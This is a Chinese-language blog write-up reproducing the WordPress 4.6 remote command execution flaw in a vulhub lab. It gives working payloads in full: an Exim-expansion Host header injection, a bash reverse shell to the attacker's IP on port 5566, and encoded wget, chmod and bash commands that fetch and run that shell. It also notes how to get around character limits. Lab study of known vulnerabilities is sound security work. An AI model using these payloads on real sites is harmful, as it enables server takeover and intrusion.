WordPress4.6任意命令执行漏洞
2023-03-20 15:24:52 时间
前言
WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也算是一个内容管理系统(CMS)
环境搭建
docker环境 (搭建可参考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html)
靶场在vulhub即可下载
靶机centos7:192.168.31.230
攻击机kali: 192.168.31.153
导入后开启靶场
docker-compose build
docker-compose up -d
访问http://your-ip:8080/ ,安装cms系统
漏洞复现
漏洞点在忘记密码处,需要一个已知的用户可以发送数据
数据包中的Host字段的值修改为以下值,发送数据包,在/tmp下新建一个success文件
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
紧接着在kali的/var/www/html下新建一个1.txt,写入bash -i >& /dev/tcp/192.168.31.153/5566 0>&1
service apache2 start
发送shell数据包,将1.txt中的内容发送到靶机且新建一个shell文件存储
/usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt
发送数据包修改shell权限为777任意执行权限
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
发送数据包执行shell,kali监听5566端口
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
漏洞复现总结
1.该漏洞在数据包的host字段,执行的命令不能有: 、’符号
2.命令需要绝对路径
3.空格被({substr{10}{1}{)tod_log}}代替 /被({substr{0}{1}{)spool_directory}}代替
4.字段值需要全小写,且需要一个已知的用户
利用这个漏洞,发送反弹shell的文件,修改文件权限777,再用kali监听获取后台
相关文章
- 后端 --- Elasticsearch在Windows下安装
- golang 循环执行定时任务
- Python基础学习 -- 概念
- python基础学习 -- 函数
- python基础学习 -- 函数高级用法
- 栈-C语言及Python实现
- Python基础学习 -- 文件操作
- tensorflow-image处理的API讲解
- Python基础学习 -- 模块与包
- Python基础学习 -- 常用模块
- 感知机算法实现-python
- Python基础学习 -- 正则表达式
- Python基础学习 -- 面向对象
- python画二叉树
- Python基础学习 -- 异常处理
- Python基础学习 -- 迭代器
- Python基础学习 -- 生成器与装饰器
- Python基础学习 -- 同步与异步操作
- Python基础学习 -- 进程锁
- 图解 Google V8 # 18 :异步编程(一):V8是如何实现微任务的?